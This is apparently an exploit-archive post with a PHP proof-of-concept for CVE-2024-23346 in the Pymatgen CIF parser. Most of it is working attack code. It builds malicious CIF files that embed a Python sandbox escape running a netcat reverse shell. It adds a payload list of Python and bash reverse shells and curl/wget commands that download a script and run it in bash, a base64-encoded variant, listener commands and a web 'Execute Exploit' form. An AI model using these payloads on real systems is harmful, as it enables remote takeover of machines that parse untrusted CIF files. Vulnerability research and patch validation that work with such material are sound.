=============================================================================================================================================
| # Title     : Pymatgen 2024.1 CIF Parser Reverse Shell Exploit                                                                            |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits)                                                            |
| # Vendor    : https://pymatgen.org/                                                                                                       |
=============================================================================================================================================

[+] Summary : 
             Pymatgen version 2024.1 contains a critical remote code execution vulnerability in its Crystallographic Information File (CIF) 
			 parser that allows attackers to execute arbitrary Python code through specially crafted CIF files, leading to complete system compromise.
			 The vulnerability exists in the CIF parser's handling of the _space_group_magn.transform_BNS_Pp_abc field, 
			 which improperly evaluates Python code embedded in CIF files without proper sanitization, allowing arbitrary code execution during file parsing.
			 
[+]  POC : 

php poc.php 

<?php

class PymatgenRCEExploit {
    
    private $ip;
    private $port;
    private $malicious_file = 'vuln.cif';
    
    public function __construct($ip, $port) {
        $this->ip = $ip;
        $this->port = $port;
    }
    
    public function create_malicious_cif() {
        $malicious_cif = <<<CIF
data_5yOhtAoR
_audit_creation_date            2024-11-13
_audit_creation_method          "CVE-2024-23346 Pymatgen CIF Parser Reverse Shell Exploit"

loop_
_parent_propagation_vector.id
_parent_propagation_vector.kxkykz
k1 [0 0 0]

_space_group_magn.transform_BNS_Pp_abc  'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("nc {$this->ip} {$this->port} -e /bin/bash");0,0,0'

_space_group_magn.number_BNS  62.448
_space_group_magn.name_BNS  "P  n'  m  a'  "
CIF;

        if (file_put_contents($this->malicious_file, $malicious_cif)) {
            echo "[+] Malicious CIF file created: {$this->malicious_file}\n";
            return true;
        } else {
            echo "[-] Failed to create malicious CIF file\n";
            return false;
        }
    }
    
    public function exploit() {
        echo "[*] Starting Pymatgen RCE Exploit (CVE-2024-23346)\n";
        echo "[*] Target: Pymatgen 2024.1\n";
        echo "[*] Reverse Shell: {$this->ip}:{$this->port}\n";

        if (!$this->create_malicious_cif()) {
            return false;
        }

        if (!$this->check_dependencies()) {
            return false;
        }
        
        echo "[*] Triggering the exploit by parsing malicious CIF file...\n";

        $python_script = $this->generate_python_trigger();
        $temp_python_file = 'trigger_exploit_' . bin2hex(random_bytes(4)) . '.py';
        
        file_put_contents($temp_python_file, $python_script);

        $output = shell_exec("python3 " . escapeshellarg($temp_python_file) . " 2>&1");

        unlink($temp_python_file);
        if (file_exists($this->malicious_file)) {
            unlink($this->malicious_file);
        }
        
        echo "[*] Exploit triggered\n";
        echo "[*] Check your listener for reverse shell connection\n";
        
        if (!empty($output)) {
            echo "[*] Python output: " . trim($output) . "\n";
        }
        
        return true;
    }
    
    private function check_dependencies() {
        echo "[*] Checking dependencies...\n";

        $python_check = shell_exec("which python3 2>/dev/null");
        if (empty($python_check)) {
            echo "[-] Python3 is not installed or not in PATH\n";
            return false;
        }
        echo "[+] Python3 found: " . trim($python_check) . "\n";

        $pymatgen_check = shell_exec("python3 -c 'import pymatgen; print(pymatgen.__version__)' 2>/dev/null");
        if (empty($pymatgen_check)) {
            echo "[-] Pymatgen is not installed\n";
            echo "[*] Attempting to install pymatgen...\n";
            
            $install_output = shell_exec("pip3 install pymatgen==2024.1 2>&1");
            if (strpos($install_output, 'Successfully installed') === false) {
                echo "[-] Failed to install pymatgen\n";
                return false;
            }
            echo "[+] Pymatgen installed successfully\n";
        } else {
            echo "[+] Pymatgen found: version " . trim($pymatgen_check) . "\n";

            if (version_compare(trim($pymatgen_check), '2024.1', '==')) {
                echo "[+] Vulnerable version detected\n";
            } else {
                echo "[!] Different version detected: " . trim($pymatgen_check) . " - exploit may still work\n";
            }
        }
        
        return true;
    }
    
    private function generate_python_trigger() {
        return <<<PYTHON
import sys
import os

try:
    from pymatgen.io.cif import CifParser
    
    print("[*] Attempting to parse malicious CIF file...")
    parser = CifParser("{$this->malicious_file}")
    structure = parser.parse_structures()
    print("[+] CIF file parsed successfully")
    
except Exception as e:
    print(f"[-] Error during parsing: {{e}}")
    sys.exit(1)

PYTHON;
    }
    
    public function generate_listener_commands() {
        echo "\n[*] Setup listener using one of these commands:\n";
        echo "    nc -lvnp {$this->port}\n";
        echo "    ncat -lvnp {$this->port}\n";
        echo "    socat TCP-LISTEN:{$this->port},reuseaddr,fork EXEC:/bin/bash\n";
    }
}

class PymatgenAlternativeExploits {
    
    public static function generate_different_payload($ip, $port, $payload_type = 'reverse_shell') {
        $payloads = [
            'reverse_shell' => "nc {$ip} {$port} -e /bin/bash",
            'python_reverse' => "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"{$ip}\",{$port}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"])'",
            'bash_reverse' => "bash -i >& /dev/tcp/{$ip}/{$port} 0>&1",
            'curl_download' => "curl http://{$ip}:8000/shell.sh | bash",
            'wget_download' => "wget -q -O - http://{$ip}:8000/shell.sh | bash"
        ];
        
        return $payloads[$payload_type] ?? $payloads['reverse_shell'];
    }
    
    public static function create_advanced_malicious_cif($ip, $port, $payload_type = 'reverse_shell') {
        $payload = self::generate_different_payload($ip, $port, $payload_type);

        $encoded_payload = base64_encode($payload);
        $advanced_payload = "echo '{$encoded_payload}' | base64 -d | bash";
        
        $malicious_cif = <<<CIF
data_CVE_2024_23346
_audit_creation_date            2024-11-13
_audit_creation_method          "Research Purpose Only"

_space_group_magn.transform_BNS_Pp_abc  'a,b,[d for d in ().__class__.__bases__[0].__subclasses__() if d.__name__ == "BuiltinImporter"][0].load_module("os").system("{$advanced_payload}");0,0,0'

_space_group_magn.number_BNS  62.448
_space_group_magn.name_BNS  "P  n'  m  a'  "
CIF;

        return $malicious_cif;
    }
}

class SimplePymatgenExploit {
    
    public static function quick_exploit($ip, $port) {
        $cif_content = self::generate_malicious_cif($ip, $port);
        $filename = 'exploit_' . bin2hex(random_bytes(4)) . '.cif';
        
        file_put_contents($filename, $cif_content);
        
        $python_code = "
from pymatgen.io.cif import CifParser
try:
    parser = CifParser('{$filename}')
    structures = parser.parse_structures()
    print('Exploit triggered successfully')
except Exception as e:
    print(f'Error: {e}')
";
        
        $temp_py = 'temp_exploit.py';
        file_put_contents($temp_py, $python_code);
        
        echo "[*] Executing exploit...\n";
        system("python3 {$temp_py}");

        unlink($filename);
        unlink($temp_py);
    }
    
    private static function generate_malicious_cif($ip, $port) {
        return <<<CIF
data_Exploit
_audit_creation_date 2024-11-13

_space_group_magn.transform_BNS_Pp_abc  'a,b,[c for c in ().__class__.__base__.__subclasses__() if c.__name__ == "BuiltinImporter"][0].load_module("os").system("nc {$ip} {$port} -e /bin/bash");0,0,0'
CIF;
    }
}

if (php_sapi_name() === 'cli' && isset($argv[0]) && basename($argv[0]) === basename(__FILE__)) {
    
    if ($argc < 3) {
        echo "Pymatgen 2024.1 Remote Code Execution (CVE-2024-23346)\n";
        echo "======================================================\n";
        echo "Usage: php " . $argv[0] . " <LHOST> <LPORT>\n";
        echo "Example: php " . $argv[0] . " 192.168.1.100 4444\n";
        echo "\nAdditional options (environment variables):\n";
        echo "PAYLOAD_TYPE=reverse_shell|python_reverse|bash_reverse\n";
        echo "QUICK_MODE=true\n";
        exit(1);
    }
    
    $lhost = $argv[1];
    $lport = $argv[2];
    $payload_type = getenv('PAYLOAD_TYPE') ?: 'reverse_shell';
    $quick_mode = getenv('QUICK_MODE') === 'true';
    
    try {
        if ($quick_mode) {
            echo "[*] Running in quick mode...\n";
            SimplePymatgenExploit::quick_exploit($lhost, $lport);
        } else {
            $exploit = new PymatgenRCEExploit($lhost, $lport);
            
            if ($exploit->exploit()) {
                $exploit->generate_listener_commands();
            }
        }
        
        echo "\n[*] Note: This exploit targets CVE-2024-23346 in Pymatgen 2024.1\n";
        echo "[*] The vulnerability is in the CIF parser's handling of malicious input\n";
        
    } catch (Exception $e) {
        echo "[-] Exploit failed: " . $e->getMessage() . "\n";
        exit(1);
    }
}

if (isset($_GET['web']) && $_GET['web'] === 'true') {
    header('Content-Type: text/html; charset=utf-8');
    ?>
    <!DOCTYPE html>
    <html>
    <head>
        <title>Pymatgen RCE Exploit (CVE-2024-23346)</title>
        <style>
            body { font-family: Arial, sans-serif; margin: 40px; }
            .container { max-width: 800px; margin: 0 auto; }
            .form-group { margin: 15px 0; }
            label { display: block; margin-bottom: 5px; }
            input, select { padding: 8px; width: 200px; }
            button { padding: 10px 20px; background: #007cba; color: white; border: none; cursor: pointer; }
            .output { background: #f4f4f4; padding: 15px; margin: 15px 0; white-space: pre-wrap; }
        </style>
    </head>
    <body>
        <div class="container">
            <h1>Pymatgen RCE Exploit (CVE-2024-23346)</h1>
            
            <?php
            if ($_POST['exploit'] ?? false) {
                $ip = $_POST['ip'] ?? '';
                $port = $_POST['port'] ?? '';
                $payload_type = $_POST['payload_type'] ?? 'reverse_shell';
                
                if (!empty($ip) && !empty($port)) {
                    echo "<div class='output'>";
                    try {
                        $exploit = new PymatgenRCEExploit($ip, $port);
                        $exploit->exploit();
                        $exploit->generate_listener_commands();
                    } catch (Exception $e) {
                        echo "Error: " . $e->getMessage();
                    }
                    echo "</div>";
                }
            }
            ?>
            
            <form method="post">
                <input type="hidden" name="exploit" value="true">
                
                <div class="form-group">
                    <label>Your IP Address:</label>
                    <input type="text" name="ip" value="<?= $_SERVER['REMOTE_ADDR'] ?? '' ?>" required>
                </div>
                
                <div class="form-group">
                    <label>Listener Port:</label>
                    <input type="number" name="port" value="4444" required>
                </div>
                
                <div class="form-group">
                    <label>Payload Type:</label>
                    <select name="payload_type">
                        <option value="reverse_shell">Netcat Reverse Shell</option>
                        <option value="python_reverse">Python Reverse Shell</option>
                        <option value="bash_reverse">Bash Reverse Shell</option>
                    </select>
                </div>
                
                <button type="submit">Execute Exploit</button>
            </form>
            
            <div style="margin-top: 30px; font-size: 0.9em; color: #666;">
                <strong>Note:</strong> This exploit requires pymatgen 2024.1 to be installed on the target system.
                The vulnerability allows remote code execution through malicious CIF file parsing.
            </div>
        </div>
    </body>
    </html>
    <?php
    exit;
}

?>





Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================